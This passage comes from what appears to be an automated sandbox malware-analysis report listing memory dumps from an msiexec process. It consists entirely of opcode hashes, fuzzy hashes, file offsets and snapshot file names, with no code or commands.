                                                                                                • API String ID:
                                                                                                • Opcode ID: 9d71fcd6ddd6514b6e9df2a609917b4561af195f9abd398cba45966796bc2930
                                                                                                • Instruction ID: 0680248f8da9af33dbcc51efdf212f02d76606f7b94dcd8a5d6c1b2777a48ba9
                                                                                                • Opcode Fuzzy Hash: 9d71fcd6ddd6514b6e9df2a609917b4561af195f9abd398cba45966796bc2930
                                                                                                • Instruction Fuzzy Hash: 77D1A274E00218CFDB58DFA9C994B9DBBB2BF89300F2085A9D809AB355DB355E81CF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628741594.0000000021580000.00000040.00000800.00020000.00000000.sdmp, Offset: 21580000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_21580000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 38fe7293901bc9ce483932107637c5233dc9347af3d4b9c848e47039f14bf0b2
                                                                                                • Instruction ID: b0e5c563c5c3425dc89a6e9772ad73a9dbdb77ad74b2859ccffafc9ee7c30869
                                                                                                • Opcode Fuzzy Hash: 38fe7293901bc9ce483932107637c5233dc9347af3d4b9c848e47039f14bf0b2
                                                                                                • Instruction Fuzzy Hash: 4BD1B278E00218CFDB58DFA5C990B9DBBB2BF89300F2085A9D809AB355DB355E85CF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628741594.0000000021580000.00000040.00000800.00020000.00000000.sdmp, Offset: 21580000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_21580000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3bf620d31a68a8f4f0fd78d2eb78778cd4a00b212477e7b64c07014fc036fe22
                                                                                                • Instruction ID: 03718c004a051b036a58cc08ca3fa7f98a9ecb16a0dcc298c29f6068d0b74cd3
                                                                                                • Opcode Fuzzy Hash: 3bf620d31a68a8f4f0fd78d2eb78778cd4a00b212477e7b64c07014fc036fe22
                                                                                                • Instruction Fuzzy Hash: B6D1B378E00218CFDB58DFA9C940B9DBBB2BF89300F2085A9D809AB355DB755E81CF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628741594.0000000021580000.00000040.00000800.00020000.00000000.sdmp, Offset: 21580000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_21580000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 24627756753e3b832300ae7af698ff865bd6fa8814cbc136cd83a03d1786b22e
                                                                                                • Instruction ID: bc15efac8374d3207a957b1fe57a3cc0f105360f2872b7307b7ce9c6546ebadc
                                                                                                • Opcode Fuzzy Hash: 24627756753e3b832300ae7af698ff865bd6fa8814cbc136cd83a03d1786b22e
                                                                                                • Instruction Fuzzy Hash: BBD1A278E00218CFDB58DFA5C984B9DBBB2BF89300F2085A9D809AB355DB355E81CF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628741594.0000000021580000.00000040.00000800.00020000.00000000.sdmp, Offset: 21580000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_21580000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0209d007a4fcc37eee0ac10fc1939ba6c0d8fa6ccd8bde829e9b5a4481a4568c
                                                                                                • Instruction ID: e101cb817b0fb221da68888e95d6420991f7cef1305a8889062f52bdc323f0d7
                                                                                                • Opcode Fuzzy Hash: 0209d007a4fcc37eee0ac10fc1939ba6c0d8fa6ccd8bde829e9b5a4481a4568c
                                                                                                • Instruction Fuzzy Hash: 62D1A278E00218CFDB58DFA5C990B9DBBB2BF89300F2485A9D809AB355DB355E81CF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628741594.0000000021580000.00000040.00000800.00020000.00000000.sdmp, Offset: 21580000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_21580000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b39fa417c17d61149fffec712894b766e4a4cdd0f98650ba123cdcb9d35ed0b5
                                                                                                • Instruction ID: aa7461f104208509a0fd7ef436641ba8b32e000471c90ec75e06574eda2a2d23
                                                                                                • Opcode Fuzzy Hash: b39fa417c17d61149fffec712894b766e4a4cdd0f98650ba123cdcb9d35ed0b5
                                                                                                • Instruction Fuzzy Hash: CAD1B278E00218CFDB58DFA5C980B9DBBB2BF89300F2085A9D809AB355DB755E81CF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628741594.0000000021580000.00000040.00000800.00020000.00000000.sdmp, Offset: 21580000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_21580000_msiexec.jbxd
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_21580000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 430da8337d516be6257b83bbc54b3d8612b5f1beff123f4f8f9515e6ada652b9
                                                                                                • Instruction ID: 456f818d85bc8ad85ea279fcfc3c4a52913cbab9df8400facacbdd2986f4b265
                                                                                                • Opcode Fuzzy Hash: 430da8337d516be6257b83bbc54b3d8612b5f1beff123f4f8f9515e6ada652b9
                                                                                                • Instruction Fuzzy Hash: 7AC19074E00218CFDB58DFA5C994B9DBBB2BF89300F2085A9D809AB355DB359E85CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628813126.0000000021720000.00000040.00000800.00020000.00000000.sdmp, Offset: 21720000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_21720000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a1f14ec79c7c3c3dfaa2153f60b6e169284a75c933ef7d875e08915566274eb0
                                                                                                • Instruction ID: f9fb01ca4e03056b195098ef79cbf76be1d02809b47b94c1b364f8cbde282a97
                                                                                                • Opcode Fuzzy Hash: a1f14ec79c7c3c3dfaa2153f60b6e169284a75c933ef7d875e08915566274eb0
                                                                                                • Instruction Fuzzy Hash: 3B9150B1900625CFD714AFA0D85C7EEBBB1FB4A306F10552AD501772E4CBB84A84CFA9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628813126.0000000021720000.00000040.00000800.00020000.00000000.sdmp, Offset: 21720000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_21720000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 92572ff6cc759a72ef2c3137790b67a4991965981e59cf139252a00dd9bf1151
                                                                                                • Instruction ID: 664bec6f39c89a49e4fbe870bc737190fc49b13c762bc45aaa2e0e97f065d85e
                                                                                                • Opcode Fuzzy Hash: 92572ff6cc759a72ef2c3137790b67a4991965981e59cf139252a00dd9bf1151
                                                                                                • Instruction Fuzzy Hash: EE914FB1900625CFD714AFA0D95C7EEBBB1FB4A306F10552AD501772E4CB784A84CFA9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628813126.0000000021720000.00000040.00000800.00020000.00000000.sdmp, Offset: 21720000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_21720000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0b6506eb06413d5a8e73f06f3113b0a265a9d7e2740a6afd3cebd78a277a642b
                                                                                                • Instruction ID: 8fa116c2ece714b60527e1cb0f58eb01e750e96531d1cb4793d35518526c2697
                                                                                                • Opcode Fuzzy Hash: 0b6506eb06413d5a8e73f06f3113b0a265a9d7e2740a6afd3cebd78a277a642b
                                                                                                • Instruction Fuzzy Hash: 0BB1A874E00618CFDB58DFA9C994A9DBBB2FF89300F1481A9D819AB365DB349D41CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5b47328d317e2176c19d9f2621d715166ab977f9cbda1d1bc91f09949f341fa9
                                                                                                • Instruction ID: 6dd622504d98b18c15831bda8ba1cddd6702234539779f6d675357ec3bf56e30
                                                                                                • Opcode Fuzzy Hash: 5b47328d317e2176c19d9f2621d715166ab977f9cbda1d1bc91f09949f341fa9
                                                                                                • Instruction Fuzzy Hash: 81A17D74A01228CFDB69DF24C894B99BBB2BF8A301F5085EAD50DA7350DB359E81CF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 51e1ce435243fc974b948c0fcc43ff6c66ba77533a741adf76536c924b971f21
                                                                                                • Instruction ID: 7536b942bdc7e0767a9ec912dfda9d00eed1bb46ffda3dfa8dd87de26f6f6406
                                                                                                • Opcode Fuzzy Hash: 51e1ce435243fc974b948c0fcc43ff6c66ba77533a741adf76536c924b971f21
                                                                                                • Instruction Fuzzy Hash: 465108B0E01218CFDB04EFA9C584BEDBBF2FB89314F109529D5086B294D7759A45CBA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d1569cec2406d943968939a8735401085f2614dd7ca0a511b4919b8818dcd351
                                                                                                • Instruction ID: 064addc428e10b6c468839def1c18f02afa7b1c4b54a4b7993dd63ab74c47a04
                                                                                                • Opcode Fuzzy Hash: d1569cec2406d943968939a8735401085f2614dd7ca0a511b4919b8818dcd351
                                                                                                • Instruction Fuzzy Hash: 515107B0E01218CFDB04EFA8C584BDDBBB6FB49314F209519D508AB294D7759A86CFA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6973f500902aaf299138be93b56f939a949a7f1df25df4107a66e9ff63df62d2
                                                                                                • Instruction ID: 10de498488082fa57733af97618bdc25247081218561b49697a16ad1686617ec
                                                                                                • Opcode Fuzzy Hash: 6973f500902aaf299138be93b56f939a949a7f1df25df4107a66e9ff63df62d2
                                                                                                • Instruction Fuzzy Hash: 44516074A01228DFCB69DF24D894BADB7B2BB4A301F5085E9D40DA7350DB359E81CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.628813126.0000000021720000.00000040.00000800.00020000.00000000.sdmp, Offset: 21720000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_21720000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: da63816591da9f93cf45e937f899ba39408003164b362f0a9c024e2a7b786919
                                                                                                • Instruction ID: 0520e69be42c51937bc0c982287c85c15a1e9cc378c03bfcb56bd7846028397c
                                                                                                • Opcode Fuzzy Hash: da63816591da9f93cf45e937f899ba39408003164b362f0a9c024e2a7b786919
                                                                                                • Instruction Fuzzy Hash: 5ED06774D143589ACF10EFA4E9447AEB7B5BB89204F0028E5D108A3210D7309A508E46